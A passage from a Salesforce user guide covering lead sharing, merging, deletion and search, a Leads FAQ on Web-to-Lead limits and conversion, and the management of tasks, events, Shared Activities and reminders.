organization’s default access levels.

To view and manage sharing details, click Sharing on the lead detail page. The Sharing Detail page lists the users, groups,
roles, and territories that have sharing access to the lead. On this page, you can do any of the following:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant access to the record for other users, groups, roles, or territories.

Note:  To share a lead with another user, that user must have the “Read” permission on leads.

• Click Expand List to view all users that have access to the record.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

See Also:
Leads Home
Leads Overview
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Merging Duplicate Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo view leads:

“Delete” on leadsTo merge leads:

To merge duplicate leads:

1. Select a lead record.
2. Click Find Duplicates.
3. Select up to three leads in the matching leads list that you want to merge.

Optionally, enter a new lead name or company and click Search to find another lead to merge. Salesforce performs a phrase
search for matches in the Name and Company fields. It also considers an implied wildcard after any entry. Search results
include matches for any fields you enter, so if you enter Bob Jones who works at Acme, search results include anyone named
Bob Jones at any company and any lead with Acme as a company.

4. Click Merge Leads.

Tip:  Click Convert Lead to quickly convert the selected lead into an existing account, opportunity, and contact.

5. Select one lead as the “Master Record.” Any data in hidden or read-only fields will be taken from the Master Record.
However, administrators and users with the “Edit Read Only Fields” permission can manually select which read-only fields
to retain. Note that hidden fields are not displayed during the merge.

6. Select the fields that you want to retain from each record.

When there is conflicting data, the fields in the left column are preselected and the row is marked.

7. Click the Merge button to complete the merge.
8. Click OK to confirm.

Notes About Merging Leads

• Any related items from the duplicate leads, such as campaign or activity information, will be associated with the newly
merged lead.

• If you are merging duplicate leads that are members of different campaigns, the campaign Member Status Updated
date for each lead is retained and associated with the newly merged lead.

• In Professional, Enterprise, Unlimited, and Developer Edition organizations, any sharing rules are applied to the newly
merged lead.

• All discarded duplicate records are moved to the Recycle Bin.
• The newly merged lead displays the Created By date from the oldest lead you are merging, and shows the merge date

as the Modified By date.
• In organizations that use divisions, the merged lead is assigned to the division of the Master Record, unless you select

otherwise.
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• The fields visible in the search results for duplicate leads and matching accounts, contacts, and opportunities are controlled
by the search layouts for those types of records.

• The master lead replaces the duplicate leads in all the requested meetings they were invited to. Also, all meeting messages
written by the duplicate leads are automatically associated with the master lead. (Meeting messages appear on the requested
meeting's Web page and are visible to all invitees.)

• The master lead replaces the duplicate leads in all the scheduled meetings they were invited to. However, make sure to
edit the event detail page and click Add to Invitees to add the new master lead to the meeting invitee list.

See Also:
Merging Duplicate Contacts
Merging Duplicate Accounts

Deleting Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delete” on leadsTo delete leads:

To delete a lead, click Del next to the lead on the leads list page, or click Delete on the lead detail page.

When you delete a lead, the lead record is moved to the Recycle Bin. Associated notes, attachments, and activities are deleted
along with the lead. If you undelete the lead, any related notes, attachments, and activities are also restored.

Note:  You can delete a lead if you are an administrator, the lead owner, or a user above the lead owner in the
organization role hierarchy and you have the “Delete” permission on leads.

See Also:
Displaying and Editing Leads

Searching for Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo view leads:

1. Enter your search terms in the sidebar or header search box.

1012

Deleting LeadsTracking Potential Opportunities as Leads



2. Click Search.

If you're using local lead names, search finds matches for standard or local lead names.

3. From the search results, click an item to open it or click Edit, if available.

You can also create a lead list view to find leads that match specific criteria.

See Also:
Displaying and Editing Leads
Leads Home

TRACKING POTENTIAL OPPORTUNITIES AS LEADS FAQS

Leads FAQ
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

• What is a Lead?

• What are the advantages of using leads?

• Can I convert existing accounts or contacts into leads?

• How many leads can we capture from our website?

• What if my company reaches the limit for web-generated leads?

• How do I specify which information to capture online?

• Can I capture leads from multiple web pages?

• How can our webmaster test the Web-to-Lead page?

• Who owns new web-generated leads?

• What status is assigned to web-generated leads?

• How can I be sure that leads won't be lost?

• How can I tell which of my leads are new?

• What happens when I convert a lead?

• How are lead fields mapped to other fields during conversion?

See Also:
Importing Leads
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What is a Lead?
Leads are people who are interested in your product and service. Converting leads to loyal customers will provide success
within a business. By managing your leads in a systematic and structured way, you can increase both the numbers of leads you
generate and how many leads you convert.

See Also:
Leads FAQ

What are the advantages of using leads?
Using leads allows your company to maintain two separate lists - one for prospective customers and one for existing customers.
You can store your prospects as leads, and then once a lead becomes qualified, you can convert it to an account, contact, and,
optionally, an opportunity.

Leads are especially useful if your company has two separate teams - one that handles lead generation and mass marketing
and one that handles sales. The lead generation team can concentrate their work on the Leads tab, and the opportunity team
can use the Account, Contact, and Opportunity tabs.

See Also:
Leads FAQ

Can I convert existing accounts or contacts into leads?
No. As an alternative, create an opportunity for the account or contact. If you prefer to use a lead, create a report containing
the accounts or contacts you want to convert into leads, export them, and then import them as leads.

See Also:
Leads FAQ

How many leads can we capture from our website?
In Professional, Enterprise, Unlimited, and Developer Edition organizations, you can capture up to 500 leads in a 24–hour
period. If your organization exceeds its daily Web-to-Lead limit, the Default Lead Creator (specified in the Web-to-Lead
setup page) receives an email containing the additional lead information. If your company regularly exceeds the Web-to-Lead
limit, click Help & Training at the top of any page and select the My Cases tab to submit a request for a higher limit directly
to salesforce.com.

When your organization reaches the 24–hour limit, salesforce.com stores additional requests in a pending request queue that
contains both Web-to-Case and Web-to-Lead requests. The requests are submitted when the limit refreshes. The pending
request queue has a limit of 50,000 combined requests. If your organization reaches the pending request limit, additional
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requests are rejected and not queued. Your administrator receives email notifications for the first five rejected submissions.
Contact salesforce.com Customer Support to change your organization's pending request limit.

See Also:
Leads FAQ

What if my company reaches the limit for web-generated
leads?

The daily limit for Web-to-Lead requests is 500. If your company generates more leads than the maximum allowed, the
Default Lead Creator (specified in the Web-to-Lead setup page) will receive an email containing the captured information.
Contact Customer Support if your company would like to generate over 500 Web-to-Lead requests per day.

See Also:
Leads FAQ

How do I specify which information to capture online?
When you generate the HTML for your company’s website, you can choose which standard or custom lead fields for which
you want to gather information. You must create the custom lead fields prior to generating the HTML code. From Setup,
click Customize > Leads > Web-to-Lead to set up this feature and generate the necessary HTML.

See Also:
Leads FAQ

Can I capture leads from multiple web pages?
Yes. Insert the generated HTML code into the web pages from which you want to capture leads. Whenever someone submits
information on any of those web pages, a lead will be created.

See Also:
Leads FAQ

How can our webmaster test the Web-to-Lead page?
Add the following line to your Web-to-Lead page code if you want to see a debugging page when you submit the form. Don't
forget to remove this line before releasing the Web-to-Lead page on your website.
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<input type="hidden" name="debug" value="1">

See Also:
Leads FAQ

Who owns new web-generated leads?
Your administrator can create a lead assignment rule to determine how web leads will be automatically assigned to different
users or queues. In addition, your administrator must customize the Lead Settings to specify a Default Lead Owner to whom
all web leads will be assigned if the assignment rule fails to locate an owner. If you do not use assignment rules, all web leads
will be assigned to the Default Lead Creator (specified in the Web-to-Lead setup).

See Also:
Leads FAQ

What status is assigned to web-generated leads?
All new web leads are marked with a status equal to the “default status” that your administrator selects when editing the Lead
Status picklist values. In addition, web-generated leads are marked with the “Unread” flag; they have a check mark in the
Unread column on the lead list views. When a user views or edits a new web lead, the lead is automatically set to “Read.” This
way you can easily locate all new leads using the My Unread Leads list view.

See Also:
Leads FAQ

How can I be sure that leads won't be lost?
The daily limit for Web-to-Lead requests is 500. If your organization exceeds its daily Web-to-Lead limit, the Default Lead
Creator (specified in the Web-to-Lead setup page) receives an email containing the additional lead information.

If a new lead cannot be generated due to errors in your Web-to-Lead setup, Customer Support is notified so that we can assist
you in correcting it.

Salesforce ensures that your leads won't be lost if they are submitted during a scheduled Salesforce downtime.

See Also:
Leads FAQ
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How can I tell which of my leads are new?
When a lead is assigned to you, either manually transferred, imported, or generated from the web, the lead is marked as
“Unread,” that is, it has a check mark in the Unread column on leads list views. To view your new leads, select the My Unread
Leads list view on the Leads tab. When you view or edit an “Unread” lead, it is automatically marked as “Read.”

See Also:
Leads FAQ

What happens when I convert a lead?
When you convert a lead, Salesforce creates a new account, contact, and, optionally, an opportunity using the information
from the lead. Any campaign members are moved to the new contact and the lead becomes read only. If an existing account
and contact have the same names as those specified on the lead, you can choose to update the existing account and contact.
Information from the lead is inserted only into blank fields; Salesforce does not overwrite existing account and contact data.

All open and closed activities from the lead are attached to the account, contact, and opportunity. You can assign the owner
of the records, and schedule a follow-up task. When you assign a new owner, only the open activities are assigned to the new
owner. If you have custom lead fields, that information can be inserted into custom account, contact, or opportunity fields.
Converted leads can't be viewed, although they appear in lead reports. Salesforce updates the Last Modified Date and
Last Modified By system fields on converted leads when picklist values included on converted leads are changed.

See Also:
Leads FAQ

How are lead fields mapped to other fields during
conversion?

When you convert a lead, data in standard lead fields is transferred into standard account, contact, and opportunity fields. For
custom lead fields, the data is mapped to custom account, contact, and opportunity fields as specified by your administrator.

Any standard lead picklist fields that are blank automatically inherit the default picklist value for accounts, contacts, and
opportunities. If your organization uses record types, all records created during lead conversion adopt the default record type
for the owner of the newly-created account, contact, and opportunity.

See Also:
Leads FAQ
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Can I automatically email leads that come from my
website?

Yes. You can create auto-response rules that will email these prospects using templates that vary based on criteria you set up.

See Also:
Leads FAQ

Why can’t I see the Sharing button on a record?
The Sharing button allows users to extend the sharing of a record such as a lead, opportunity, or case. However, the Sharing
button only displays when appropriate.

The Sharing button is available when your sharing model is either Private or Public Read Only for a type of record or related
record. For example, the Sharing button may appear on an account even though your sharing model for accounts is Public
Read/Write if your sharing model for related opportunities is Public Read Only.

See Also:
View and Display FAQ

MANAGING ACTIVITIES, OPPORTUNITIES, AND PRODUCTS

TRACKING TASKS, EVENTS, AND MEETINGS

Activity Overview
Available in: All Editions except Database.com

Activities include tasks, calendar events, and requested meetings. You can define and track activities for many different objects,
including campaigns, accounts, contacts, and leads.

Activities display in related lists on associated records as well as on the Home tab.
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Note:  Administrators can modify activity fields and control the page layouts for tasks and events.

See Also:
Shared Activities Overview

Accessing Activities
Available in: All Editions except Database.com

Important:  If you use Shared Activities, you can view an activity if you have access to at least one of the contacts or
a lead related to the activity as well as a Related To object.

Viewing and editing tasks and events depends on a number of factors. Use the following table to determine who can access
activities.

You must:To do this:

View an activity • Be assigned to the activity, or

• Be above the user assigned to the activity in the role hierarchy, or

• Have at least read access to the record to which the activity is associated, or

• Have the “View All” object-level permission in the related record, where the
sharing model for that record is “Controlled By Parent” (if Shared Activities is
enabled, you need the “View All” object-level permission for at least one contact
and the related record), or

• Have the “View All Data” permission

Create an activity • Have the “Edit Tasks” and “Edit Events” permissions

AND

• Have at least read access to a record, if associating the activity with another
record

Edit an activity • Have the “Edit Tasks” and “Edit Events” permissions

AND

• Be assigned to the activity, or

• Be above the user assigned to the activity in the role hierarchy, or

• Have the “Modify All” object-level permission in the related record, where the
sharing model for that record is “Controlled By Parent” (if Shared Activities is
enabled, you need the “Modify All” object-level permission for at least one
contact and the related record), or

• Have the “Modify All Data” permission
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You must:To do this:

Delete an activity • Have the “Edit Tasks” and “Edit Events” permissions

AND

• Be assigned to the activity, or

• Be above the user assigned to the activity in the role hierarchy, or

• Have the “Modify All” object-level permission in the related record, where the
sharing model for that record is “Controlled By Parent” (if Shared Activities is
enabled, you need the “Modify All” object-level permission for at least one
contact and the related record), or

• Have the “Modify All Data” permission

View, add, and edit events on other
users’ calendars

• Have the “Edit Tasks” and “Edit Events” permissions to create and edit activities

AND

• Have access to the user’s calendar, which depends on your organization-wide
calendar sharing defaults and how the user has set up individual calendar sharing.

Note:  Events marked as private via the Private checkbox are accessible
only by the user assigned to the event. Other users cannot see the event
details when viewing that user’s calendar. However, users with the “View
All Data” or “Modify All Data” permission can see private event details in
reports and searches, or when viewing other users’ calendars.

Tip:  The user who is assigned to an activity in the Assigned To field is often referred to as the “activity owner.”

See Also:
Shared Activities Overview

Viewing Activities
Available in: All Editions except Database.com

Activities include tasks and calendar events. Activities can display in the following locations:

Home Tab

Many users go to the Home tab to view their tasks and events.

Activity Feed (Chatter)

Display a Chatter feed of updates, comments, and posts about the activity.
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Open Activities and Activity History Related Lists

You can also view, create, and update activities from the Open Activities and Activity History related lists of an associated
record. These related lists show all activities associated with the record, including activities that are assigned to other
users. See Using the Open Activities Related List on page 1031 and Using the Activity History Related List on page 1032.

Activity List Views

To display a list of activities for which you or your team is responsible for completing, click  below the calendar on
the Home tab or at the top of a calendar view. If your Home tab does not display the Calendar or My Tasks sections,
contact your administrator to customize your home page layout.

See Viewing Activity Lists on page 1021.

Reminder Window

The reminder window pops up to notify you of upcoming activities. See Using the Activity Reminder Window on page
1034.

Console

Administrators of Professional, Enterprise, Unlimited, and Developer Edition organizations can set up the console to
include activities. Click the Console tab to display the console, which allows you to find, view, and edit activities and
their associated records on one screen.

See the following for details on viewing activities:

• Viewing Your Calendar

• Viewing Event Details

• Viewing Tasks

See Also:
Accessing Activities

Viewing Activity Lists
Available in: All Editions except Database.com

User Permissions Needed

No permissions neededTo view activities owned by you and users below you in the
role hierarchy:

“View All Data”To view all activities:

To display a list of activities for which you or your team is responsible for completing, click  below the calendar on the
Home tab or at the top of a calendar view. If your Home tab does not display the Calendar or My Tasks sections, contact your
administrator to customize your home page layout.
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• Click an activity to view the detail. Click Edit or Del next to an activity subject to edit or delete a task.

• Click New Task or New Event to create a new activity.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.

The following list views are provided by Salesforce:

◊ All Activities - Shows activities that you can view. In Personal Edition, the All Activities list view shows all of your
activities.

◊ My Activities - Shows activities that you own.

◊ My Delegated Activities - Shows activities that you created but are owned by someone else.

Note:  Inviting other Salesforce users to an event or task is like delegating that activity to those users. So the
My Delegated Activities list view also shows activities for all invited users even if you still own that activity.
In the list view, the invited user appears as the person assigned to the activity but the activity's detail page
shows you as the assignee.

◊ My Team's Activities - Shows activities owned by users who report to you in the role hierarchy.

For your convenience, your team's activities are converted to your time zone.

To edit or delete any view you created, select it from the View drop-down list and click Edit.
• Archived activities are not included in activity list views. See Using the Activity History Related List for details on which

activities are archived.

See Also:
Using Your Tasks and Calendar on the Home Page

Creating Activities
Available in: All Editions except Database.com

User Permissions Needed

“Edit Tasks”To create tasks:

“Edit Events”To create events:

You can create new activity records (tasks and events) from the following locations.

In the sidebar

In the sidebar, select Task or Event from the Create New drop-down list.

On the home page

On the Home tab, click New in the My Tasks section or New Event in the Calendar section.

1022

Creating ActivitiesTracking Tasks, Events, and Meetings



On the detail page of an associated record

On the detail page of an associated record, click New Task, New Event, or New Meeting Request on the Open Activities
related list. In addition, you can click Log a Call on the Activity History related list to add a new task record with a
completed status.

When you create a new activity from a record detail page, the record becomes the related record on the new activity.
When you create a new meeting request or a new event from a contact or lead detail page, the contact or lead becomes
both the related record and an invitee on the meeting or event.

On a calendar view

On a calendar view, click New Event to add a new event. In addition:
• On day views you can click New in the My Tasks section to add a new task.

• On day views you can click a time such as 9:00 AM to add an event at that time.

• On day and week views, you can double-click a time slot to create a new event. Your administrator controls the
availability of this feature. Note that recurring events and multi-person events are not supported for click-and-create
events on calendar views.

• On week and month views you can click the Add Event icon ( ) to add an event on a particular date.

On an activity list view

On an activity list view, click New Task or New Event to create a new activity. To display an activity list view, click 
below the calendar on the Home tab or at the top of a calendar view.

On account, contact, and lead list views

On account, contact, and lead list views, click the Open Calendar link at the bottom of the page to display a weekly
view of a calendar underneath the list. Then, you can drag a record from the list to a time slot on the calendar to quickly
create an event associated with the record. Note that your administrator controls the availability of the Drag-and-Drop
Scheduling feature.

Note:  In Enterprise, Unlimited, and Developer Editions, your administrator defines the record types that you can
select when creating an activity. Record types determine the picklist values and page layouts that are available when
creating and editing a record.

See Also:
Creating Tasks
Creating Events
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Editing Activities
Available in: All Editions except Database.com

User Permissions Needed

“Edit Tasks”To edit tasks:

“Edit Events”To edit events:

See the following for details on editing activities:

• Editing Tasks

• Closing Tasks

• Editing Events

◊ Editing Multi-Person Events

◊ Editing Recurring Events

◊ Editing an Event in a Public or Resource Calendar

See Also:
Shared Activities Overview

Deleting Activities
Available in: All Editions except Database.com

Multi-person events are not available in: Personal Edition

User Permissions Needed

“Edit Tasks”To delete tasks:

“Edit Events”To delete events:

On the activity detail page, click Delete.

Salesforce moves tasks and events to the Recycle Bin.

• Your administrator can use the Mass Delete feature to delete a group of activities or archived activities. .

• For multi-person events, only the event owner can delete the event. However, when you decline an event, Salesforce
removes the event from your calendar.

• When an event owner deletes an event, all invited users receive an email notifying them that the event has been canceled.
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• When deleting a recurring event or deleting a recurring task, you can delete either a single occurrence in the series or the
entire series.

• If your organization has Shared Activities tasks aren’t deleted unless the Related To field and all contacts are deleted.

See Also:
Shared Activities Overview

SHARING TASKS AND EVENTS WITH MULTIPLE CONTACTS

Shared Activities Overview
Available in: All Editions except Database.com.

If your organization has enabled Shared Activities, you can relate as many as 50 contacts to non-recurring and non-group
tasks, and non-recurring events. You assign one primary contact; all others are secondary contacts. Sharing activities gives you
a more accurate picture when you view your task or event details and reports. Specifically, Shared Activities lets you view:

• Tasks and events when you have access to at least one contact or lead, and the related record, if it exists. You can also view
tasks and events if your role is above the activity owner’s in your organization’s hierarchy. Keep in mind, when you relate
contacts to activities to which other users have access, those users can view the activity along with the names, account
names, and titles of all the contacts you related to the activity—including the contacts to which those users may not
otherwise have access.

• All contacts related to a task on the task detail page or an event on the event detail page if your administrator adds the
Name related list to the task page layout and event page layout.

• The number of contacts related to a task or event when you use the Relation Count column in activity reports.

• One row per contact for each activity in the Activities with Contacts report when you select at least one field from the
related contact list.

• An activity’s primary contact in two reports: Tasks and Events, and Activities with Cases. The primary contact also appears
in the Name field on the task detail page or event detail page.

See Also:
Understanding Shared Activities
Learning about Differences Between Activities and Shared Activities
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Understanding Shared Activities
Available in: All Editions except Database.com.

If your organization has enabled Shared Activities, you can relate as many as 50 contacts to non-recurring and non-group
tasks, and non-recurring events. You assign one primary contact; all others are secondary contacts.

Activity History
The Activity History related list of a record displays all completed tasks, logged phone calls, saved interaction logs,
expired events, outbound email, mass email, email added from Microsoft Outlook®, and merged documents for the
record and its associated records.

Last Activity Date
The Last Activity of an account and contact is the most recent due date of an activity on the record. The following
past or future activities set this date: Any event and closed tasks. Since activities roll up through associated records, the
Last Activity date on an account can be an activity on a contact, opportunity, or other associated record. In Shared
Activities, the contact’s Last Activity date is based on the latest activity in which the contact is a primary contact.
For example:
• Jane is related to two activities.
• Jane is not the primary contact for the first activity, which has the due date 11/30.
• Jane is the primary contact for the other activity, which has the due date 11/15.
• The Last Activity is 11/15, because it’s the latest activity for which Jane is the primary contact.

Primary Contact
For activities that have multiple related contacts, you select one as the primary contact, who is the key person associated
with that particular task or event. The primary contact appears in two reports: Tasks and Events, and Activities with
Cases. If you delete the primary contact, the next contact on the activity’s related list becomes the new primary one. If
that’s not the primary contact you want, you can edit the activity to select another.

Related To
A relationship is a connection between two objects, which Salesforce uses to create related lists in page layouts and detail
levels in reports. Salesforce uses matching values in specified fields for both objects to link related data. For example, if
one object stores data about companies and another object stores data about people, a relationship identifies which people
work at the company. For example, when creating a task, you can relate a contact or opportunity to it. Then, when you
view activities for that contact or opportunity, Salesforce displays the task.

Tasks
A task is a planned activity you can relate to another type of record, such as an account, contact, lead, opportunity, or
case. You can also assign a task to a user you specify. When using Shared Activities, however, you can’t create recurring
or group tasks with more than one contact. You can specify the Subject, Status, Priority, and Due Date of the
task.

Events
An event is an activity that has a scheduled time, such as a scheduled phone call, that you can relate to another type of
record, such as an account, contact, lead, opportunity, or case. You can also assign an event to a user you specify. When
using Shared Activities, you can’t create recurring events with more than one contact. You can specify the Subject,
Start, End, and Location of the event.
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Learning about Differences Between Activities and Shared
Activities

Available in: All Editions except Database.com.

Much of the activities functionality remains the same when you use Shared Activities for tasks and events, but there are
differences.

• In Shared Activities, the contact’s Last Activity date is based on the latest activity in which the contact is a primary
contact.

• You may encounter problems with triggers, workflow, and data validation rules for the WhoId field if you add or remove
it.

• When you delete an activity, relations between the activity and any specified contacts, leads, and records are deleted. The
WhoId, WhatId, and AccountId field values are cleared. If you restore a deleted activity, relations between the activity
and any specified contacts, leads, and records relations are also restored. The WhoId, WhatId, and AccountId field values
are recalculated using the TaskRelation or EventRelation field values. When Shared Activities isn’t enabled and
you delete an activity, the WhoId, WhatId, and AccountId field values are not cleared.

• Triggers, workflow, and data validation rules aren’t available for the TaskRelation object or the EventRelation object.

• If you change the owner of a contact, only the activities in which the contact is a primary contact transfer to the new owner.
For example, the owner of the contact for Ron Dean changes, and Ron is related to two tasks:

◊ Ron is the primary contact for the task “Conference Call.”

◊ Ron is not the primary contact for the other task “Quarterly Call,” but he’s related to it.

◊ When the owner changes, only the “Conference Call” task transfers to the new owner.

• If you create an activity and relate it to an account and a contact, and that contact is related to a different account, the
activity rolls up to the contact’s parent account. For example:

◊ The “Sales Rep Call” task is related directly to the Global Media account and also to the contact Ron Dean.

◊ Ron Dean’s parent account is HiTech Solutions.

◊ The “Sales Rep Call” task appears in the Global Media account details and also in the HiTech Solution account details.

• In Chatter feeds, you can’t use feed tracking for the Name and Related to fields.

• Search filters search only on the primary contact for an activity.

See Also:
Shared Activities Overview
Understanding Shared Activities
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Understanding Primary Contacts
Available in: All Editions except Database.com.

If your organization has enabled Shared Activities, you can relate as many as 50 contacts to non-recurring and non-group
tasks, and non-recurring events. You assign one primary contact; all others are secondary contacts. For activities that have
multiple related contacts, you select one as the primary contact, who is the key person associated with that particular task or
event. The primary contact appears in two reports: Tasks and Events, and Activities with Cases. If you delete the primary
contact, the next contact on the activity’s related list becomes the new primary one. If that’s not the primary contact you want,
you can edit the activity to select another.

In Shared Activities, the contact’s Last Activity date is based on the latest activity in which the contact is a primary
contact. For example:

• Jane is related to two activities.

• Jane is not the primary contact for the first activity, which has the due date 11/30.

• Jane is the primary contact for the other activity, which has the due date 11/15.

• The Last Activity is 11/15, because it’s the latest activity for which Jane is the primary contact.

Note:

If you delete or remove an activity’s primary contact, another contact becomes the primary contact in its place. You
can edit the activity to manually select another primary contact.

See Also:
Shared Activities Overview
Understanding Shared Activities

Viewing Shared Activities in Reports
Available in: All Editions except Database.com.

If your organization has enabled Shared Activities, you can run certain standard or custom reports that display details specific
to tasks or events with multiple contacts.

UseIf you want to view

Activity reports. Add the Relation Count column to your reports.

For example, you create a task with five contacts. When you run the Tasks and Events report,
it displays “5” to indicate the number of contacts related to the task.

The number of contacts related
to an activity
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UseIf you want to view

The Activities with Contacts report. Select at least one field from the Contact object.

For example, your report includes a task with five contacts. If you include the Last Name
field from the contact object on the report, you see five rows (one row for each contact) related

One row per contact for each
activity

to this activity. If you don’t add any fields from the contact object, you see only one row for
the activity.

The Activities with Contacts report is the only report that:

• Displays all contacts on an activity

• Can be filtered using attributes of contacts other than the primary contact

Other reports show the primary contact and the total count of contacts on an activity, but
they don’t show details of the other contacts.

The Activities with Contacts report doesn’t indicate which contacts are primary or secondary.

Either the Tasks and Events report or the Activities with Cases report.

For example, if the primary contact for a task is Ron Dean, these reports display that name
in the Contact field.

An activity’s Primary Contact

See Also:
Shared Activities Overview
Understanding Shared Activities

Creating Recurring Events
Available in: All Editions except Database.com

User Permissions Needed

“Edit Events”To create recurring events:

A recurring event is an event that repeats in a series, for example a weekly staff meeting that occurs every Monday at 11:00
AM. You cannot create a recurring Shared Activities event.

Note:  No occurrence in a series of recurring events can last longer than 24 hours. Once the recurring event is created,
you can extend the length of individual occurrences beyond 24 hours, if multiday events are enabled.

1. Select Create Recurring Series of Events.
2. Select the frequency of recurrence.

1029

Creating Recurring EventsTracking Tasks, Events, and Meetings



Note:  Depending on the type of series you are creating, the maximum number of occurrences is as follows:

• Daily: 100
• Weekly: 53
• Monthly: 60
• Yearly: 10

3. Set the start date and end date. Click Calculate max end date to automatically set the maximum end date allowed based
on the frequency you selected.

4. Optionally, set a reminder on the recurring event. The reminder applies to each occurrence in the event series.

Note:  In Chatter, you can’t follow series or individual occurrences of recurring events or tasks. Changes to a series
or to an individual event or task in a series don’t show up in your Chatter feed.

See Also:
Inviting People to an Event

Deleting Recurring Events
Available in: All Editions except Database.com

User Permissions Needed

“Edit Events”To delete recurring events:

Only the event or series owner can delete an event or series of events. If you have been invited to an event or a series of events,
to remove them from your calendar, decline the event or series of events. See Responding to Events on page 1058 for more
information.

To delete a single event in a series of events:

1. Select an event from the calendar on the Home tab or from the Open Activities or Activity History related list of a record,
and then click the View Event subtab. Alternatively, hover over the event in any calendar and click Edit.

2. Click Delete Event. A warning dialog will be displayed. If you are sure you want to delete only this event in the series,
click OK.

Alternatively, hover your mouse over the event in a calendar. and click Delete in the event detail overlay.

Note:  When an event owner deletes a recurring event, all invited users receive an email notifying them that the event
has been canceled.

Deleted events are moved to the Recycle Bin. If they are restored, all the details of the event will be restored as well.

To delete a series of events:
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1. Select an event from the calendar on the Home tab or from the Open Activities or Activity History related list of a record.
2. Click the View Series subtab located above the task details, and click Delete Series. A warning dialog displays. If you are

sure you want to delete every future occurrence in the series, click OK.

Note:  Consider the following when deleting a series of events:

• Deleting a series does not delete occurrences that have already happened.

• When an event owner deletes a series of recurring events, all invited users receive a single email notifying them
that the series of events has been canceled.

• If a series is deleted and no events in the series occurred in the past, the series is placed in the Recycle Bin. Individual
events that were part of the series are not placed in the Recycle Bin.

• If a series is deleted and it contains events that occurred in the past, the series is not placed in the Recycle Bin,
and therefore it cannot be restored from the Recycle Bin.

• If you restore a series from the Recycle Bin, individual events will be created. Those individual events will have
the details as defined by the series, as well as any event-specific details that were set on the event before the series
was deleted.

Using the Open Activities Related List
Available in: All Editions except Database.com

The Open Activities related list displays:

• Open tasks

• Open events

• Requested meetings

These activities are displayed for a record and its associated records. For example, if you have a task related to a contact, that
task displays in the Open Activities related list of the contact as well as the associated account. If you use Shared Activities,
the activities display in the related list of each related contact.

From the Open Activities related list:

• Click New Task or New Event to create an activity that is associated with the record.

• Click New Meeting Request to request a meeting with a contact, lead, or person account. Once you request a meeting,

the calendar icon ( ) displays next to it.
• Click Edit to edit an activity.

• Click Cls to close a task. For more information, see Closing Tasks on page 1066.

• Click Del to delete an event or requested meeting. Salesforce.com emails the invitees that the event or meeting was canceled.

• Click the subject of an activity to open the detail page of the activity.

Your administrator can customize the fields and buttons that display in related lists.
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Note:  For person account records, the related list includes activities that have the person account in either the Name
or Related to fields. As appropriate, the Name or Related to column in the related list displays the person's
name. For more information, see What is a Person Account? on page 755.

See Also:
Using the Activity History Related List

Using the Activity History Related List
Available in: All Editions except Database.com

The Activity History related list of a record displays all completed tasks, logged phone calls, saved interaction logs, expired
events, outbound email, mass email, email added from Microsoft Outlook®, and merged documents for the record and its
associated records.

In the Activity History related list, click:

• Log A Call to enter the results of unplanned phone calls and then schedule a follow-up task. Use this feature, along with
scheduled events and tasks to track all activities for a record.

• Mail Merge to generate personalized documents using your data and Microsoft Word templates provided by your
administrator. If you choose, the merged document is listed in the Activity History related list of the associated record.
This button is not available for all types of records..

• Send An Email to send an email to a contact or lead and associate the email with both the contact or lead and the displayed
account, opportunity, case, or custom object. The email you send is automatically listed in the Activity History related list
of the contact or lead. If the subject is longer than 100 characters, it is truncated with ellipses (...). When appropriate, it
is also listed for the record associated with the email, such as the opportunity or case. This button is not available for all
types of records.

• Compose Gmail to send an email to a contact or lead from your Gmail account. The email you send is automatically listed
in the Activity History related list of the contact or lead. This button is only available if the Gmail Buttons and Links
feature is enabled. If the Gmail to Salesforce feature is also enabled, the email you send is automatically listed in the Activity
History related list of the contact or lead.

• Request Update to launch a contact update email to send to the selected contact. This email allows you to enter an
introductory note asking the contact to update the contact information you have and send a reply with the updated
information. You can update your contact record when you receive the response. These emails and the mass Stay-in-Touch
emails will be listed in the Activity History related list.

• View All to display a printable view of all completed activities.

Note that the View All button only displays when there are records to view.

• The subject of an activity to view its details.

If your organization has added the Case Activities related list to the View Cases page layout in the Self-Service portal and you
have set the field-level security to visible for the Visible in Self-Service checkbox on activities, you can click the
following:

• Make Public to display the completed activity in the activities related list on the case in the Self-Service portal.
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• Make Private to hide the completed activity in the activities related list on the case in the Self-Service portal.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Your administrator can customize the fields and buttons that display in related lists.

Note:  For person account records, the related list includes activities that have the person account in either the Name
or Related to fields. As appropriate, the Name or Related to column in the related list displays the person's
name. For more information, see What is a Person Account? on page 755.

See Also:
Using the Open Activities Related List
About Archived Activities

Setting Reminders on Activities
Available in: All Editions except Database.com

User Permissions Needed

“Edit Tasks”To edit tasks:

“Edit Events”To edit events:

Salesforce can display popup reminders for upcoming tasks and events. Reminders notify the activity assignee of an upcoming
task or event. The reminder displays in a small browser popup window when the activity assignee is logged in to Salesforce.
When a user logs in, any reminders that have not been dismissed and reminders scheduled to occur since the last time the user
logged out are shown in the reminder window.

When you create or edit an event or task, you have an option to set a reminder on it. The reminder defaults to the time specified
in your reminder settings.

To set a reminder on a task:

1. Create or edit a task.
2. Select the Reminder checkbox.
3. Choose the date and time for the reminder. You will be reminded of the task on that date and time.

If you are setting the reminder for a recurring task series, the reminder applies to each occurrence in the series.

4. Click Save.

To set a reminder on an event:

1. Create or edit an event.
2. Select the Reminder checkbox.
3. Choose how long before the event that you want to be reminded.
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4. Click Save.

See Also:
Using the Activity Reminder Window
Customizing Activity Reminders

Using the Activity Reminder Window
Available in: All Editions except Database.com

Reminders display in a small browser popup window, called the “reminder window.” When you log into Salesforce, a sound
plays and the reminder window automatically pops up if you have any task or event reminders that were triggered since you
last logged in. While you're logged in, the reminder window opens whenever a reminder is triggered. The reminder window
shows you:

• Up to 100 of the oldest reminders you haven't dismissed

• The type of activity—task or event

• The activity subject (click to see activity details)

• When the task is due or when the event is scheduled to start

• When the reminder is due or if it's overdue

When viewing reminders, task reminders are sorted by due date and event reminders are sorted by start date and time.
